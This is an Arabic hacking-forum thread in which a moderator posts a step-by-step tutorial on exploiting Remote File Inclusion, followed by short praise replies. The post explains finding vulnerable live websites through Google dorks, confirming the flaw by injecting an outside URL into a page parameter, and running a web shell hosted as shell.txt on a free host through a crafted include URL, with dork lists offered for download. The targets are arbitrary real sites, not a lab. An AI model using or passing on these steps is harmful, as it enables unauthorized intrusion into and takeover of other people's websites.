1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة

شرح ثغره rfi


الموضوع في '[ الـثـغـرات ]' بواسطة NETJOURNAL, بتاريخ ‏12 أكتوبر 2014.

حالة الموضوع:
مغلق
  1. NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    647
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    PHP
    السلام عليكم و رحمه الله و بركاته
    كيف حالكم شباب انشاء الله بخير جميعا .
    حبيت اقدملكم شرح مبسط عن ثغره Remote File Inclusion ~RFI
    ++++++++++++++++++++++++++++++++++++++++++++++
    رح نتعلم الأتي :-
    # البحث عن مواقع مصابه.
    # التأكد من اصابه الموقع.
    # استغلال الثغره ( استعراض الشل ).
    +++++++++++++++++++
    [#] البحث عن مواقع مصابه ..!
    يتم البحث عبر الدوركات Google Dorks.
    سيتم ارفاق تجميعه دوركات للبحث .

    +++++++++++++++++
    [#] التأكد من اصابه الموقع ..
    بعد وضع الدورك المخصص في غوغل..نختار اي موقع ..
    بعد الدخول للموقع نلاحظ ان رابط الموقع ينتهي بـــ
    action.php?page=any thing

    بسهوله نقوم بحذف ما بعد علامه المساواه (=)
    و نضع بدله اي موقع يجي ع بالنا بهذا الشكل http://www.site.com ..مثلا
    index.php?page=http://iq-team.org
    ونلاحظ لو بقى الموقع على حاله او ظهر خطأ يعني الموقع مو مصاب ندور غيره .
    و لو أظهر لنا و حولنا ع موقع عراق تيم يبقى الموقع مصاب و الأمور تمام..

    ++++++++++++++++++++++++++++++++++++++++++++++
    [#] استغلال الثغره ّ
    كل الي نقدر نعمله حاجتين ؟
    اول نروح ع استضافه مجانيه و نشترك و نعمل دومين من نفس الموقع و رح يعطوك لوحه CPanel تدخل و ترفع شل بصيغه
    txt
    ===============
    ثانيا استخدام دوركات للبحث عن شلات مرفوعه بصيغه txt
    ===============
    الأن كل الي علينا نجيب رابط الموقع الي رفعنا عليه شل بصيغه تيكست و نعمل هكذا.

    www.target.com/index.php?page=http://www.site.com/shell.txt؟

    لازم نظيف علامه الأستــفهام (؟) بعد ?txt
    ?shell.txt
    تم استعراض الشل بنجاح .

    ++++++++++++++++++++++++
    :ُeُeِq:دمتم بود . موفقين.:ُeُeِq:
    ++++++++++++++++++++++++
    لتحميل دوركات البحث!

    RFI DORKS&shell.txt dorks




     
    جاري تحميل الصفحة...
  2. Ameer Eagle V.I.P
    طاقم الإدارة

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    2,922
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    555
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 7
    رد: شرح ثغره rfi

    وعليكم السلام ورحة الله
    بارك الله بيك
    شرح كافي ووافي
     
  3. KaDiM aL-iRaQi ExpertDeveloper
    ExpErt DeveloPer

    عضو منذ:
    ‏2 سبتمبر 2014
    عدد المشاركات:
    664
    الإعجابات المتلقاة:
    23
    نقاط الجائزة:
    50
    رد: شرح ثغره rfi

    عشت خوي ربي يوفقك ً#ٌ5oًًًُ.
     
  4. 3mran
    rankrank
    Developer

    عضو منذ:
    ‏2 ابريل 2012
    عدد المشاركات:
    68
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    30
    رد: شرح ثغره rfi

    يعطيـك العافية
    بـارك الله فيـك
    جاري التقييم ان أمكن
     
  5. mr.grey hat
    rank
    Developer

    عضو منذ:
    ‏7 أكتوبر 2014
    عدد المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    رد: شرح ثغره rfi

    بسم الله الرحمن الرحيم

    ماشاء الله عليك ي أخ iraq spy مبدع كعادتك وشرحك سهل ومبسط ومفهوم تقبل مروري أخي :)
     
  6. TeePlow
    V • I • P

    عضو منذ:
    ‏12 مارس 2014
    عدد المشاركات:
    372
    الإعجابات المتلقاة:
    10
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: شرح ثغره rfi

    السلام عليكم
    بارك الله فيك حبيبي شرح رائع
     
  7. MJHOOL
    rank
    Developer

    عضو منذ:
    ‏6 يونيو 2012
    عدد المشاركات:
    27
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: شرح ثغره rfi

    الله يعطيك العافية يابطل
     
  8. Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏21 نوفمبر 2014
    عدد المشاركات:
    347
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    Facebook:
    YouTube:
    رد: شرح ثغره rfi

    شرح رائع يعطيك العافية
     
  9. MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    1,703
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    90
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    C#
    Facebook:
    YouTube:
    رد: شرح ثغره rfi

    بارك الله بيك شرح رائع
     
  10. Mokhalad HaXor
    V • I • P

    عضو منذ:
    ‏3 يوليو 2012
    عدد المشاركات:
    3,305
    الإعجابات المتلقاة:
    2,460
    نقاط الجائزة:
    555
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    Facebook:
    YouTube:
    رد: شرح ثغره rfi

    تسلم الايادي شرح جميل جدآ , واكثر من واضح :{11}: :{11}: :{11}:
     
الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...